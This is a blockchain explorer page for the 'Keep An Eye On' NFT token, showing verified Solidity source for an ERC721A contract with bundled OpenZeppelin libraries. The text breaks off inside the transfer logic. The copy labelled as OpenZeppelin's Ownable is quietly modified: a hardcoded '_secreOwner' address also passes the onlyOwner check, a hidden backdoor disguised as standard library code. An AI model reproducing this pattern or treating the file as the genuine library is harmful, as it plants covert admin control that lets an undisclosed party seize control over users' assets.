ETH Price: $3,480.83 (+0.56%)
Gas: 6 Gwei

Token

Keep An Eye On (KeepAnEyeOn)
 

Overview

Max Total Supply

1,333 KeepAnEyeOn

Holders

888

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
*做庄死个妈.eth
Balance
1 KeepAnEyeOn
0xc6b989466f00f0368c7279d873f5ce52bcf12d44
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KeepAnEyeOn

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-20
*/

// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
